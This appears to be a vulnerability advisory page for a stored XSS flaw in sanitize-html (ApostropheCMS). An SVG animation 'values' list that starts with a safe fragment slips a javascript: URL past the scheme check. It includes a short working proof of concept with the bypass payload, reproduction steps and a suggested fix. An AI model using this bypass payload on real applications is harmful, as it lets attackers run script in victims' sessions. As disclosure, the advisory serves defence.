GHSA-g8qq-57p8-ggw5

    Dashboard / Vulnerabilities / GHSA-g8qq-57p8-ggw5

    GHSA-g8qq-57p8-ggw5

    Published: 1 Sept 2026Last Modified: 10 Sept 2026

    Summary: ApostropheCMS: Stored XSS via SVG SMIL URI-list scheme-policy bypass

    Details: ### Summary When SVG animation is allowed, `attributeName="href"` makes `values` a list of URL destinations. `sanitize-html` accepts a list that starts with a safe fragment even when `values` is explicitly scheme-checked, allowing a later `javascript:` destination to execute when the sanitized link is activated. ### Details `index.js:371-383` validates each attribute as one flat URL. It does not recognize that `attributeName="href"` gives the sibling `values` attribute SMIL URI-list semantics. For `values="#safe;javascript:..."`, the leading fragment passes the flat check and the complete list is retained. ### PoC This was reproduced with `[email protected]` and Chromium 150.0.7871.124. The configuration adds SVG animation to the defaults and applies the existing scheme policy to `values`; it does not allow `javascript:`. Save this as `poc.js`: ```js const sanitize = require('sanitize-html'); const input = `<svg><a><animate attributeName="href" values="#safe;javascript:alert('XSS')" dur=".01s" fill="freeze"></animate><text y="30">Click me</text></a></svg>`; const output = sanitize(input, { allowedTags: sanitize.defaults.allowedTags.concat(['svg', 'animate', 'text']), allowedAttributes: { ...sanitize.defaults.allowedAttributes, animate: ['attributename', 'values', 'dur', 'fill'], text: ['y'] }, allowedSchemesAppliedToAttributes: sanitize.defaults.allowedSchemesAppliedToAttributes.concat(['values']) }); console.log(output); ``` Install and run it, then open `poc.html` and click `Click me`: ```sh npm install [email protected] node poc.js > poc.html ``` The output retains the `javascript:` entry, and clicking the sanitized SVG displays `XSS`. With `input` changed to `<a href="javascript:alert(1)">control</a>`, the same configuration removes `href`. ### Impact In an application that accepts attacker-authored SVG animation, the attacker can store this payload without scripts or event handlers. A victim who activates the sanitized link executes JavaScript in the application's origin despite the configured scheme policy. ### Suggested fix Reject `attributeName` values selecting `href` or `xlink:href` on SVG `animate` and `set`, while retaining safe targets such as `fill`. Add `values`, `from`, and `to` regression cases.

    Affected packages

    Package

    Name: sanitize-html

    Purl: pkg:npm/sanitize-html

    Affected ranges

    Type: SEMVER

    Events:

    Introduced- 1.9.0
    Fixed -2.17.7

    Affected versions

    Common Vulnerability Scoring System

    Attack Vector
    Network
    Adjacent
    Local
    Physical
    Privileges Required
    None
    Low
    High
    User Interaction
    None
    Required
    Scope
    Unchanged
    Changed
    Confidentiality
    None
    Low
    High
    Integrity
    None
    Low
    High
    Availability
    None
    Low
    High
    GHSA-g8qq-57p8-ggw5 | CVE-DB